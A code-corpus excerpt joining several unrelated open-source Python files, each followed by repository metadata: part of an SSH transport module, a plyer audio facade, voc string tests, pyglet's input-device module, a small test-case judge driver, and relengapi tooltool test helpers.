agreed_local_ciphers = filter(client_encrypt_algo_list.__contains__,
self._preferred_ciphers)
agreed_remote_ciphers = filter(server_encrypt_algo_list.__contains__,
self._preferred_ciphers)
if (len(agreed_local_ciphers) == 0) or (len(agreed_remote_ciphers) == 0):
raise SSHException('Incompatible ssh server (no acceptable ciphers)')
self.local_cipher = agreed_local_ciphers[0]
self.remote_cipher = agreed_remote_ciphers[0]
self._log(DEBUG, 'Ciphers agreed: local=%s, remote=%s' % (self.local_cipher, self.remote_cipher))
if self.server_mode:
agreed_remote_macs = filter(self._preferred_macs.__contains__, client_mac_algo_list)
agreed_local_macs = filter(self._preferred_macs.__contains__, server_mac_algo_list)
else:
agreed_local_macs = filter(client_mac_algo_list.__contains__, self._preferred_macs)
agreed_remote_macs = filter(server_mac_algo_list.__contains__, self._preferred_macs)
if (len(agreed_local_macs) == 0) or (len(agreed_remote_macs) == 0):
raise SSHException('Incompatible ssh server (no acceptable macs)')
self.local_mac = agreed_local_macs[0]
self.remote_mac = agreed_remote_macs[0]
if self.server_mode:
agreed_remote_compression = filter(self._preferred_compression.__contains__, client_compress_algo_list)
agreed_local_compression = filter(self._preferred_compression.__contains__, server_compress_algo_list)
else:
agreed_local_compression = filter(client_compress_algo_list.__contains__, self._preferred_compression)
agreed_remote_compression = filter(server_compress_algo_list.__contains__, self._preferred_compression)
if (len(agreed_local_compression) == 0) or (len(agreed_remote_compression) == 0):
raise SSHException('Incompatible ssh server (no acceptable compression) %r %r %r' % (agreed_local_compression, agreed_remote_compression, self._preferred_compression))
self.local_compression = agreed_local_compression[0]
self.remote_compression = agreed_remote_compression[0]
self._log(DEBUG, 'using kex %s; server key type %s; cipher: local %s, remote %s; mac: local %s, remote %s; compression: local %s, remote %s' %
(agreed_kex[0], self.host_key_type, self.local_cipher, self.remote_cipher, self.local_mac,
self.remote_mac, self.local_compression, self.remote_compression))
# save for computing hash later...
# now wait! openssh has a bug (and others might too) where there are
# actually some extra bytes (one NUL byte in openssh's case) added to
# the end of the packet but not parsed. turns out we need to throw
# away those bytes because they aren't part of the hash.
self.remote_kex_init = chr(MSG_KEXINIT) + m.get_so_far()
def _activate_inbound(self):
"switch on newly negotiated encryption parameters for inbound traffic"
block_size = self._cipher_info[self.remote_cipher]['block-size']
if self.server_mode:
IV_in = self._compute_key('A', block_size)
key_in = self._compute_key('C', self._cipher_info[self.remote_cipher]['key-size'])
else:
IV_in = self._compute_key('B', block_size)
key_in = self._compute_key('D', self._cipher_info[self.remote_cipher]['key-size'])
engine = self._get_cipher(self.remote_cipher, key_in, IV_in)
mac_size = self._mac_info[self.remote_mac]['size']
mac_engine = self._mac_info[self.remote_mac]['class']
# initial mac keys are done in the hash's natural size (not the potentially truncated
# transmission size)
if self.server_mode:
mac_key = self._compute_key('E', mac_engine.digest_size)
else:
mac_key = self._compute_key('F', mac_engine.digest_size)
self.packetizer.set_inbound_cipher(engine, block_size, mac_engine, mac_size, mac_key)
compress_in = self._compression_info[self.remote_compression][1]
if (compress_in is not None) and ((self.remote_compression != 'zlib@openssh.com') or self.authenticated):
self._log(DEBUG, 'Switching on inbound compression ...')
self.packetizer.set_inbound_compressor(compress_in())
def _activate_outbound(self):
"switch on newly negotiated encryption parameters for outbound traffic"
m = Message()
m.add_byte(chr(MSG_NEWKEYS))
self._send_message(m)
block_size = self._cipher_info[self.local_cipher]['block-size']
if self.server_mode:
IV_out = self._compute_key('B', block_size)
key_out = self._compute_key('D', self._cipher_info[self.local_cipher]['key-size'])
else:
IV_out = self._compute_key('A', block_size)
key_out = self._compute_key('C', self._cipher_info[self.local_cipher]['key-size'])
engine = self._get_cipher(self.local_cipher, key_out, IV_out)
mac_size = self._mac_info[self.local_mac]['size']
mac_engine = self._mac_info[self.local_mac]['class']
# initial mac keys are done in the hash's natural size (not the potentially truncated
# transmission size)
if self.server_mode:
mac_key = self._compute_key('F', mac_engine.digest_size)
else:
mac_key = self._compute_key('E', mac_engine.digest_size)
self.packetizer.set_outbound_cipher(engine, block_size, mac_engine, mac_size, mac_key)
compress_out = self._compression_info[self.local_compression][0]
if (compress_out is not None) and ((self.local_compression != 'zlib@openssh.com') or self.authenticated):
self._log(DEBUG, 'Switching on outbound compression ...')
self.packetizer.set_outbound_compressor(compress_out())
if not self.packetizer.need_rekey():
self.in_kex = False
# we always expect to receive NEWKEYS now
self._expect_packet(MSG_NEWKEYS)
def _auth_trigger(self):
self.authenticated = True
# delayed initiation of compression
if self.local_compression == 'zlib@openssh.com':
compress_out = self._compression_info[self.local_compression][0]
self._log(DEBUG, 'Switching on outbound compression ...')
self.packetizer.set_outbound_compressor(compress_out())
if self.remote_compression == 'zlib@openssh.com':
compress_in = self._compression_info[self.remote_compression][1]
self._log(DEBUG, 'Switching on inbound compression ...')
self.packetizer.set_inbound_compressor(compress_in())
def _parse_newkeys(self, m):
self._log(DEBUG, 'Switch to new keys ...')
self._activate_inbound()
# can also free a bunch of stuff here
self.local_kex_init = self.remote_kex_init = None
self.K = None
self.kex_engine = None
if self.server_mode and (self.auth_handler is None):
# create auth handler for server mode
self.auth_handler = AuthHandler(self)
if not self.initial_kex_done:
# this was the first key exchange
self.initial_kex_done = True
# send an event?
if self.completion_event != None:
self.completion_event.set()
# it's now okay to send data again (if this was a re-key)
if not self.packetizer.need_rekey():
self.in_kex = False
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.set()
finally:
self.clear_to_send_lock.release()
return
def _parse_disconnect(self, m):
code = m.get_int()
desc = m.get_string()
self._log(INFO, 'Disconnect (code %d): %s' % (code, desc))
def _parse_global_request(self, m):
kind = m.get_string()
self._log(DEBUG, 'Received global request "%s"' % kind)
want_reply = m.get_boolean()
if not self.server_mode:
self._log(DEBUG, 'Rejecting "%s" global request from server.' % kind)
ok = False
elif kind == 'tcpip-forward':
address = m.get_string()
port = m.get_int()
ok = self.server_object.check_port_forward_request(address, port)
if ok != False:
ok = (ok,)
elif kind == 'cancel-tcpip-forward':
address = m.get_string()
port = m.get_int()
self.server_object.cancel_port_forward_request(address, port)
ok = True
else:
ok = self.server_object.check_global_request(kind, m)
extra = ()
if type(ok) is tuple:
extra = ok
ok = True
if want_reply:
msg = Message()
if ok:
msg.add_byte(chr(MSG_REQUEST_SUCCESS))
msg.add(*extra)
else:
msg.add_byte(chr(MSG_REQUEST_FAILURE))
self._send_message(msg)
def _parse_request_success(self, m):
self._log(DEBUG, 'Global request successful.')
self.global_response = m
if self.completion_event is not None:
self.completion_event.set()
def _parse_request_failure(self, m):
self._log(DEBUG, 'Global request denied.')
self.global_response = None
if self.completion_event is not None:
self.completion_event.set()
def _parse_channel_open_success(self, m):
chanid = m.get_int()
server_chanid = m.get_int()
server_window_size = m.get_int()
server_max_packet_size = m.get_int()
chan = self._channels.get(chanid)
if chan is None:
self._log(WARNING, 'Success for unrequested channel! [??]')
return
self.lock.acquire()
try:
chan._set_remote_channel(server_chanid, server_window_size, server_max_packet_size)
self._log(INFO, 'Secsh channel %d opened.' % chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open_failure(self, m):
chanid = m.get_int()
reason = m.get_int()
reason_str = m.get_string()
lang = m.get_string()
reason_text = CONNECTION_FAILED_CODE.get(reason, '(unknown code)')
self._log(INFO, 'Secsh channel %d open FAILED: %s: %s' % (chanid, reason_str, reason_text))
self.lock.acquire()
try:
self.saved_exception = ChannelException(reason, reason_text)
if chanid in self.channel_events:
self._channels.delete(chanid)
if chanid in self.channel_events:
self.channel_events[chanid].set()
del self.channel_events[chanid]
finally:
self.lock.release()
return
def _parse_channel_open(self, m):
kind = m.get_string()
chanid = m.get_int()
initial_window_size = m.get_int()
max_packet_size = m.get_int()
reject = False
if (kind == 'auth-agent@openssh.com') and (self._forward_agent_handler is not None):
self._log(DEBUG, 'Incoming forward agent connection')
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == 'x11') and (self._x11_handler is not None):
origin_addr = m.get_string()
origin_port = m.get_int()
self._log(DEBUG, 'Incoming x11 connection from %s:%d' % (origin_addr, origin_port))
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif (kind == 'forwarded-tcpip') and (self._tcp_handler is not None):
server_addr = m.get_string()
server_port = m.get_int()
origin_addr = m.get_string()
origin_port = m.get_int()
self._log(DEBUG, 'Incoming tcp forwarded connection from %s:%d' % (origin_addr, origin_port))
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
elif not self.server_mode:
self._log(DEBUG, 'Rejecting "%s" channel request from server.' % kind)
reject = True
reason = OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
else:
self.lock.acquire()
try:
my_chanid = self._next_channel()
finally:
self.lock.release()
if kind == 'direct-tcpip':
# handle direct-tcpip requests comming from the client
dest_addr = m.get_string()
dest_port = m.get_int()
origin_addr = m.get_string()
origin_port = m.get_int()
reason = self.server_object.check_channel_direct_tcpip_request(
my_chanid, (origin_addr, origin_port),
(dest_addr, dest_port))
else:
reason = self.server_object.check_channel_request(kind, my_chanid)
if reason != OPEN_SUCCEEDED:
self._log(DEBUG, 'Rejecting "%s" channel request from client.' % kind)
reject = True
if reject:
msg = Message()
msg.add_byte(chr(MSG_CHANNEL_OPEN_FAILURE))
msg.add_int(chanid)
msg.add_int(reason)
msg.add_string('')
msg.add_string('en')
self._send_message(msg)
return
chan = Channel(my_chanid)
self.lock.acquire()
try:
self._channels.put(my_chanid, chan)
self.channels_seen[my_chanid] = True
chan._set_transport(self)
chan._set_window(self.window_size, self.max_packet_size)
chan._set_remote_channel(chanid, initial_window_size, max_packet_size)
finally:
self.lock.release()
m = Message()
m.add_byte(chr(MSG_CHANNEL_OPEN_SUCCESS))
m.add_int(chanid)
m.add_int(my_chanid)
m.add_int(self.window_size)
m.add_int(self.max_packet_size)
self._send_message(m)
self._log(INFO, 'Secsh channel %d (%s) opened.', my_chanid, kind)
if kind == 'auth-agent@openssh.com':
self._forward_agent_handler(chan)
elif kind == 'x11':
self._x11_handler(chan, (origin_addr, origin_port))
elif kind == 'forwarded-tcpip':
chan.origin_addr = (origin_addr, origin_port)
self._tcp_handler(chan, (origin_addr, origin_port), (server_addr, server_port))
else:
self._queue_incoming_channel(chan)
def _parse_debug(self, m):
always_display = m.get_boolean()
msg = m.get_string()
lang = m.get_string()
self._log(DEBUG, 'Debug msg: ' + util.safe_string(msg))
def _get_subsystem_handler(self, name):
try:
self.lock.acquire()
if name not in self.subsystem_table:
return (None, [], {})
return self.subsystem_table[name]
finally:
self.lock.release()
_handler_table = {
MSG_NEWKEYS: _parse_newkeys,
MSG_GLOBAL_REQUEST: _parse_global_request,
MSG_REQUEST_SUCCESS: _parse_request_success,
MSG_REQUEST_FAILURE: _parse_request_failure,
MSG_CHANNEL_OPEN_SUCCESS: _parse_channel_open_success,
MSG_CHANNEL_OPEN_FAILURE: _parse_channel_open_failure,
MSG_CHANNEL_OPEN: _parse_channel_open,
MSG_KEXINIT: _negotiate_keys,
}
_channel_handler_table = {
MSG_CHANNEL_SUCCESS: Channel._request_success,
MSG_CHANNEL_FAILURE: Channel._request_failed,
MSG_CHANNEL_DATA: Channel._feed,
MSG_CHANNEL_EXTENDED_DATA: Channel._feed_extended,
MSG_CHANNEL_WINDOW_ADJUST: Channel._window_adjust,
MSG_CHANNEL_REQUEST: Channel._handle_request,
MSG_CHANNEL_EOF: Channel._handle_eof,
MSG_CHANNEL_CLOSE: Channel._handle_close,
}
|
bitprophet/ssh
|
ssh/transport.py
|
Python
|
lgpl-2.1
| 88,838 | 0.002161 |
'''
Audio
=====
The :class:`Audio` is used for recording audio.
Default path for recording is set in platform implementation.
.. note::
On Android the `RECORD_AUDIO`, `WAKE_LOCK` permissions are needed.
Simple Examples
---------------
To get the file path::
>>> audio.file_path
'/sdcard/testrecorder.3gp'
To set the file path::
>>> import os
>>> current_list = os.listdir('.')
['/sdcard/testrecorder.3gp', '/sdcard/testrecorder1.3gp',
'/sdcard/testrecorder2.3gp', '/sdcard/testrecorder3.3gp']
>>> file_path = current_list[2]
>>> audio.file_path = file_path
To start recording::
>>> from plyer import audio
>>> audio.start()
To stop recording::
>>> audio.stop()
To play recording::
>>> audio.play()
'''
class Audio(object):
'''
Audio facade.
'''
state = 'ready'
_file_path = ''
def __init__(self, file_path):
super(Audio, self).__init__()
self._file_path = file_path
def start(self):
'''
Start record.
'''
self._start()
self.state = 'recording'
def stop(self):
'''
Stop record.
'''
self._stop()
self.state = 'ready'
def play(self):
'''
Play current recording.
'''
self._play()
self.state = 'playing'
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, location):
'''
Location of the recording.
'''
assert isinstance(location, (basestring, unicode)), \
'Location must be string or unicode'
self._file_path = location
# private
def _start(self):
raise NotImplementedError()
def _stop(self):
raise NotImplementedError()
def _play(self):
raise NotImplementedError()
|
johnbolia/plyer
|
plyer/facades/audio.py
|
Python
|
mit
| 1,873 | 0 |
from .. utils import TranspileTestCase, UnaryOperationTestCase, BinaryOperationTestCase, InplaceOperationTestCase
class StrTests(TranspileTestCase):
def test_setattr(self):
self.assertCodeExecution("""
x = "Hello, world"
x.attr = 42
print('Done.')
""")
def test_endswith(self):
self.assertCodeExecution("""
s = "abracadabra"
suffix = "abra"
print(s.endswith(end))
""")
self.assertCodeExecution("""
s = "abracadabra"
suffix = "ABRA"
print(s.endswith(end))
""")
self.assertCodeExecution("""
s = "ABRACADABRA"
suffix = "abra"
print(s.endswith(end))
""")
# self.assertCodeExecution("""
# print('abracadabra'.endswith('abra'))
# """)
def test_getattr(self):
self.assertCodeExecution("""
x = "Hello, world"
print(x.attr)
print('Done.')
""")
def test_getitem(self):
# Simple positive index
self.assertCodeExecution("""
x = "12345"
print(x[2])
""")
# Simple negative index
self.assertCodeExecution("""
x = "12345"
print(x[-2])
""")
# Positive index out of range
self.assertCodeExecution("""
x = "12345"
print(x[10])
""")
# Negative index out of range
self.assertCodeExecution("""
x = "12345"
print(x[-10])
""")
def test_slice(self):
# Full slice
self.assertCodeExecution("""
x = "12345"
print(x[:])
""")
# Left bound slice
self.assertCodeExecution("""
x = "12345"
print(x[1:])
""")
# Right bound slice
self.assertCodeExecution("""
x = "12345"
print(x[:4])
""")
# Slice bound in both directions
self.assertCodeExecution("""
x = "12345"
print(x[1:4])
""")
# Slice bound in both directions with end out of bounds
self.assertCodeExecution("""
x = "12345"
print(x[1:6])
""")
# Slice bound in both directions with start out of bounds
self.assertCodeExecution("""
x = "12345"
print(x[6:7])
""")
def test_case_changes(self):
self.assertCodeExecution("""
for s in ['hello, world', 'HEllo, WORLD', 'átomo', '']:
print(s.capitalize())
print(s.lower())
# print(s.swap())
print(s.title())
print(s.upper())
""")
def test_index(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('world'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.index('hell', -4))
""")
def test_count(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('e'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('a'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 3, 4))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 0, 4))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('ll', 0, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.count('hell', -4))
""")
def test_find(self):
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('world'))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, 3))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, 100))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', 1, -1))
""")
self.assertCodeExecution("""
s = 'hello hell'
print(s.find('hell', -4))
""")
def test_expand(self):
self.assertCodeExecution("""
print('\\t'.expandtabs())
print('a\\t'.expandtabs())
print('aa\\t'.expandtabs())
print('aaa\\t'.expandtabs())
print('aaaaaaaa\\t'.expandtabs())
print('a\\naa\\t'.expandtabs())
print('\\t'.expandtabs(3))
print('a\\t'.expandtabs(3))
print('aa\\t'.expandtabs(7))
print('aaa\\t'.expandtabs(4))
print('aaaaaaaa\\t'.expandtabs(4))
print('a\\naa\\t'.expandtabs(4))
""")
def test_title(self):
self.assertCodeExecution("""
s = ' foo bar baz '
print(s.title())
""")
def test_len(self):
self.assertCodeExecution("""
s = ' foo bar baz '
print(len(s))
""")
class UnaryStrOperationTests(UnaryOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
]
class BinaryStrOperationTests(BinaryOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
'test_add_class',
'test_add_frozenset',
'test_and_class',
'test_and_frozenset',
'test_eq_class',
'test_eq_frozenset',
'test_floor_divide_class',
'test_floor_divide_complex',
'test_floor_divide_frozenset',
'test_ge_class',
'test_ge_frozenset',
'test_gt_class',
'test_gt_frozenset',
'test_le_class',
'test_le_frozenset',
'test_lshift_class',
'test_lshift_frozenset',
'test_lt_class',
'test_lt_frozenset',
'test_modulo_bool',
'test_modulo_bytes',
'test_modulo_bytearray',
'test_modulo_class',
'test_modulo_complex',
'test_modulo_dict',
'test_modulo_float',
'test_modulo_frozenset',
'test_modulo_slice',
'test_modulo_int',
'test_modulo_list',
'test_modulo_None',
'test_modulo_NotImplemented',
'test_modulo_range',
'test_modulo_set',
'test_modulo_str',
'test_modulo_tuple',
'test_multiply_class',
'test_multiply_frozenset',
'test_ne_class',
'test_ne_frozenset',
'test_or_class',
'test_or_frozenset',
'test_power_class',
'test_power_frozenset',
'test_rshift_class',
'test_rshift_frozenset',
'test_subscr_bool',
'test_subscr_class',
'test_subscr_frozenset',
'test_subscr_slice',
'test_subtract_class',
'test_subtract_frozenset',
'test_true_divide_class',
'test_true_divide_frozenset',
'test_xor_class',
'test_xor_frozenset',
]
class InplaceStrOperationTests(InplaceOperationTestCase, TranspileTestCase):
data_type = 'str'
not_implemented = [
'test_add_class',
'test_add_frozenset',
'test_and_class',
'test_and_frozenset',
'test_floor_divide_class',
'test_floor_divide_complex',
'test_floor_divide_frozenset',
'test_lshift_class',
'test_lshift_frozenset',
'test_modulo_bool',
'test_modulo_bytes',
'test_modulo_bytearray',
'test_modulo_class',
'test_modulo_complex',
'test_modulo_dict',
'test_modulo_float',
'test_modulo_frozenset',
'test_modulo_slice',
'test_modulo_int',
'test_modulo_list',
'test_modulo_None',
'test_modulo_NotImplemented',
'test_modulo_range',
'test_modulo_set',
'test_modulo_str',
'test_modulo_tuple',
'test_multiply_class',
'test_multiply_frozenset',
'test_or_class',
'test_or_frozenset',
'test_power_class',
'test_power_frozenset',
'test_rshift_class',
'test_rshift_frozenset',
'test_subtract_class',
'test_subtract_frozenset',
'test_true_divide_class',
'test_true_divide_frozenset',
'test_xor_class',
'test_xor_frozenset',
]
|
Felix5721/voc
|
tests/datatypes/test_str.py
|
Python
|
bsd-3-clause
| 9,931 | 0.000101 |
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Joystick, tablet and USB HID device support.
This module provides a unified interface to almost any input device, besides
the regular mouse and keyboard support provided by `Window`. At the lowest
level, `get_devices` can be used to retrieve a list of all supported devices,
including joysticks, tablets, space controllers, wheels, pedals, remote
controls, keyboards and mice. The set of returned devices varies greatly
depending on the operating system (and, of course, what's plugged in).
At this level pyglet does not try to interpret *what* a particular device is,
merely what controls it provides. A `Control` can be either a button, whose
value is either ``True`` or ``False``, or a relative or absolute-valued axis,
whose value is a float. Sometimes the name of a control can be provided (for
example, ``x``, representing the horizontal axis of a joystick), but often
not. In these cases the device API may still be useful -- the user will have
to be asked to press each button in turn or move each axis separately to
identify them.
Higher-level interfaces are provided for joysticks, tablets and the Apple
remote control. These devices can usually be identified by pyglet positively,
and a base level of functionality for each one provided through a common
interface.
To use an input device:
1. Call `get_devices`, `get_apple_remote` or `get_joysticks`
to retrieve and identify the device.
2. For low-level devices (retrieved by `get_devices`), query the devices
list of controls and determine which ones you are interested in. For
high-level interfaces the set of controls is provided by the interface.
3. Optionally attach event handlers to controls on the device.
4. Call `Device.open` to begin receiving events on the device. You can
begin querying the control values after this time; they will be updated
asynchronously.
5. Call `Device.close` when you are finished with the device (not needed
if your application quits at this time).
To use a tablet, follow the procedure above using `get_tablets`, but note that
no control list is available; instead, calling `Tablet.open` returns a
`TabletCanvas` onto which you should set your event handlers.
:since: pyglet 1.2
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import sys
from base import Device, Control, RelativeAxis, AbsoluteAxis, \
Button, Joystick, AppleRemote, Tablet
from base import DeviceException, DeviceOpenException, DeviceExclusiveException
_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc
def get_apple_remote(display=None):
'''Get the Apple remote control device.
The Apple remote is the small white 6-button remote control that
accompanies most recent Apple desktops and laptops. The remote can only
be used with Mac OS X.
:Parameters:
`display` : `Display`
Currently ignored.
:rtype: `AppleRemote`
:return: The remote device, or ``None`` if the computer does not support
it.
'''
return None
if _is_epydoc:
def get_devices(display=None):
'''Get a list of all attached input devices.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Device`
'''
def get_joysticks(display=None):
'''Get a list of attached joysticks.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Joystick`
'''
def get_tablets(display=None):
'''Get a list of tablets.
This function may return a valid tablet device even if one is not
attached (for example, it is not possible on Mac OS X to determine if
a tablet device is connected). Despite returning a list of tablets,
pyglet does not currently support multiple tablets, and the behaviour
is undefined if more than one is attached.
:Parameters:
`display` : `Display`
The display device to query for input devices. Ignored on Mac
OS X and Windows. On Linux, defaults to the default display
device.
:rtype: list of `Tablet`
'''
else:
def get_tablets(display=None):
return []
if sys.platform == 'linux2':
from x11_xinput import get_devices as xinput_get_devices
from x11_xinput_tablet import get_tablets
from evdev import get_devices as evdev_get_devices
from evdev import get_joysticks
def get_devices(display=None):
return (evdev_get_devices(display) +
xinput_get_devices(display))
elif sys.platform in ('cygwin', 'win32'):
from directinput import get_devices, get_joysticks
try:
from wintab import get_tablets
except:
pass
elif sys.platform == 'darwin':
from pyglet import options as pyglet_options
if pyglet_options['darwin_cocoa']:
from darwin_hid import get_devices, get_joysticks, get_apple_remote
else:
from carbon_hid import get_devices, get_joysticks, get_apple_remote
from carbon_tablet import get_tablets
|
mpasternak/pyglet-fix-issue-552
|
pyglet/input/__init__.py
|
Python
|
bsd-3-clause
| 7,205 | 0.001249 |
#! /usr/bin/python
#should move this file inside docker image
import ast
import solution
'''driver file running the program
takes the test cases from the answers/question_name file
and executes each test case. The output of each execution
will be compared and the program outputs a binary string.
Eg : 1110111 means out of 7 test cases 4th failed and rest
all passed.
Resource/Time limit errors will be produced from docker container'''
#opening and parsing test cases
with open ("answer") as file: # change after development finishes
cases=file.readlines();
cases = [x.strip() for x in cases]
cases = [ast.literal_eval(x) for x in cases]
s="" #return string
number_of_cases = len(cases)/2
for i in range(number_of_cases):
if type(cases[i]) is tuple:
if cases[number_of_cases+i] == solution.answer(*cases):
s+="1"
else:
s+="0"
else:
if cases[number_of_cases+i] == solution.answer(cases[i]):
s+="1"
else:
s+="0"
print s
|
akhilerm/Castle
|
storage/app/public/drivers/driver.py
|
Python
|
mit
| 1,024 | 0.019531 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import
import datetime
import hashlib
import json
import time
import urlparse
from contextlib import contextmanager
import boto.exception
import mock
import moto
import pytz
from nose.tools import eq_
from relengapi.blueprints import tooltool
from relengapi.blueprints.tooltool import tables
from relengapi.blueprints.tooltool import util
from relengapi.lib import auth
from relengapi.lib import time as relengapi_time
from relengapi.lib.permissions import p
from relengapi.lib.testing.context import TestContext
def userperms(perms, email='me'):
u = auth.HumanUser(email)
u._permissions = set(perms)
return u
cfg = {
'AWS': {
'access_key_id': 'aa',
'secret_access_key': 'ss',
},
'TOOLTOOL_REGIONS': {
'us-east-1': 'tt-use1',
'us-west-2': 'tt-usw2',
}
}
test_context = TestContext(config=cfg, databases=['relengapi'],
user=userperms([p.tooltool.download.public,
p.tooltool.upload.public]))
allow_anon_cfg = cfg.copy()
allow_anon_cfg['TOOLTOOL_ALLOW_ANONYMOUS_PUBLIC_DOWNLOAD'] = True
ONE = '1\n'
ONE_DIGEST = hashlib.sha512(ONE).hexdigest()
TWO = '22\n'
TWO_DIGEST = hashlib.sha512(TWO).hexdigest()
NOW = 1425592922
class NoEmailUser(auth.BaseUser):
type = 'no-email'
def get_id(self):
return 'no-email:sorry'
def get_permissions(self):
return [p.tooltool.upload.public]
def mkbatch(message="a batch"):
return {
'message': message,
'files': {
'one': {
'algorithm': 'sha512',
'size': len(ONE),
'digest': ONE_DIGEST,
'visibility': 'public',
},
},
}
def upload_batch(client, batch, region=None):
region_arg = '?region={}'.format(region) if region else ''
return client.post_json('/tooltool/upload' + region_arg, data=batch)
def add_file_to_db(app, content, regions=['us-east-1'],
pending_regions=[], visibility='public'):
with app.app_context():
session = app.db.session('relengapi')
file_row = tables.File(size=len(content),
visibility=visibility,
sha512=hashlib.sha512(content).hexdigest())
session.add(file_row)
session.commit()
for region in regions:
session.add(tables.FileInstance(
file_id=file_row.id, region=region))
for region in pending_regions:
session.add(tables.PendingUpload(
file=file_row, region=region,
expires=relengapi_time.now() + datetime.timedelta(seconds=60)))
session.commit()
return file_row
def add_batch_to_db(app, author, message, files):
with app.app_context():
session = app.db.session('relengapi')
batch = tables.Batch(author=author, message=message,
uploaded=relengapi_time.now())
session.add(batch)
for filename, file in files.iteritems():
session.add(tables.BatchFile(filename=filename, batch=batch, file=file))
session.commit()
return batch
def add_file_to_s3(app, content, region='us-east-1'):
with app.app_context():
conn = app.aws.connect_to('s3', region)
bucket_name = cfg['TOOLTOOL_REGIONS'][region]
try:
conn.head_bucket(bucket_name)
except boto.exception.S3ResponseError:
conn.create_bucket(bucket_name)
bucket = conn.get_bucket(bucket_name)
key_name = util.keyname(hashlib.sha512(content).hexdigest())
key = bucket.new_key(key_name)
key.set_contents_from_string(content)
@contextmanager
def set_time(now=NOW):
with mock.patch('time.time') as fake_time, \
mock.patch('relengapi.lib.time.now') as fake_now:
fake_time.return_value = now
fake_now.return_value = datetime.datetime.fromtimestamp(now, pytz.UTC)
yield
@contextmanager
def not_so_random_choice():
with mock.patch('random.choice') as choice:
choice.side_effect = lambda seq: sorted(seq)[0]
yield
def assert_signed_302(resp, digest, method='GET', region=None,
expires_in=60, bucket=None):
eq_(resp.status_code, 302)
url = resp.headers['Location']
assert_signed_url(url, digest, method=method, region=region,
expires_in=expires_in, bucket=bucket)
def assert_signed_url(url, digest, method='GET', region=None,
expires_in=60, bucket=None):
region = region or 'us-east-1'
bucket = bucket or cfg['TOOLTOOL_REGIONS'][region]
if region == 'us-east-1':
host = '{}.s3.amazonaws.com'.format(bucket)
else:
host = '{}.s3-{}.amazonaws.com'.format(bucket, region)
url = urlparse.urlparse(url)
eq_(url.scheme, 'https')
eq_(url.netloc, host)
eq_(url.path, '/' + util.keyname(digest))
query = urlparse.parse_qs(url.query)
assert 'Signature' in query
